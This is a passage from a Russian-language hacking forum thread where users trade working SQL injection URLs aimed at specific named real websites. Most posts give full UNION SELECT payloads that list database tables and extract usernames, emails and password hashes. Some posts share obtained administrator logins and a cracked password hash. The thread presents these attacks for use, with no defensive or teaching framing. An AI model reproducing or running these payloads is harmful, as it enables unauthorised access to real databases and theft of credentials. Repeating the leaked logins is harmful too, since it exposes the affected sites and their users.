(= ведь это журнал! там новерное одана таблица те оперу села какя нить пост с кучей новостей типа архива или ещё чё нить! А вот например как мне просканить на таблицу юзер?
Велемир, терпение надо иметь, а не пытаца найти легкий путь В крайнем случае написать граббер если не хватает терпения 38 таблиц ручками прочекать. И это при том, что первые 16 - системные
Там есть таблица be_users. В ней поля: -uid -pid -tstamp -username -password -admin -usergroup -email И ещё до*** и больше. Вот и вытаскивай.
Покажи запрос плиз что после http://www.modvlad.ru/photo/?g=-1+union+select+111,222,version(),444,555,666/* http://www.modvlad.ru/photo/?g=37+union+select+table_name,2,3,4,5,6+from+infor%20mation_schema.tables+limit+38,1/* делал мне для себя надо знать и как тащить и я вас больше не потревожу! в формате http:// к примеру username плиз оч надо для обучения!
На форум Логин Administrator Пароль simbol Есть админка, но в какой таблице пароли хз Вот тебе запрос для вывода данных юзеров из форума http://www.modvlad.ru/photo/?g=-1+union+select+111,222,username,user_password,555,666+from+forum_users/*
значит сейчас нада писать вот так http://wow.alania.net/gilds.php?guid=-3+union+select+111,222,username,user_password/*
Сейчас нужно идти вот сюда http://forum.antichat.ru/showthread.php?t=19605 и ЧИТАТЬ ЧИТАТЬ ЧИТАТЬ а иначе всегда будут подобные вопросы.... вот чесно, сам подумай ОТКУДА ТЫ взял что там есть эти поля и ИЗ КАКОЙ таблицы ты выводишь Удачи!
Давайте все-таки в этой теме задавать вопросы, а не бредовать на тему сделайте мне скуль иньекцию. Здесь могут помочь в нестандартном\непонятном случае, но забивать тему элементарными вопросами сто раз расписанными в статьях не стоит. Буду удалять
_http://wow.alania.net/gilds.php?guid=-3+union+select+1,concat_ws(0x3a,username,sha_pass_hash),3,4,5,6,7,8,9,10,11,12+from+realmd.account+limit+0,1/* Константинэ... только не ругай меня... P.S Не могу уснуть...
JoN.SmiT не падай в минуса..) читай ману. еще чтот разкрутил.. administrator:d9d1b168eac8f197e0576b56cfc23ece => gfhjkm administrator;password Есть скуля в поле login, как получить аутпут?)
http://www.rciscc.uz/rarticles.php?section[id]=-99999999'+order+by+1/* - здесь 1 колонка http://www.rciscc.uz/rarticles.php?section[id]=-99999999'+union+select+1/* - а тут пишет - в чем проблема? В неправильных количествах колонок? Их всего одна Хм..странно. Вот тут все нормально сработало: http://www.rciscc.uz/news.php?id=110'+union+select+1,2,3,user(),5,6,7/*
в общем есть скуль: Code: http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat(column_name,0x3c2f62723e)+from+information_schema.columns+where+table_name='user'/* но при попытке просмотра таблицы Code: http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat_ws(0x3a3a,login,password,email,0x3c2f62723e)+from+medsunr_mifegyn.user/* мы ничего не получаем (точнее получаем ошибку) следовательно доступ к стаблице закрыт? или я что то не так делаю...
2 gisTy таблица пустая: _http://www.women-medcenter.ru/index.phtml?id=-25999'+union+select+1,count(*)+from+user/*
Это обычная таблица (не VIEW), т.ч. фильтрации вывода нет. Записей в ней нет. http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat(TABLE_NAME,'-',TABLE_TYPE,'-',TABLE_ROWS,0x3c2f62723e)+from+INFORMATION_SCHEMA.TABLES/* Хотя можно посмотреть и так. http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,COUNT(*)+from+medsunr_mifegyn.user/* Если бы небыло прав, то показало бы ошибку.
Ershik, такая ситуация неоднократно расписывалась, объяснение в чем причина и решение проблемы - http://forum.antichat.ru/showpost.php?p=497033
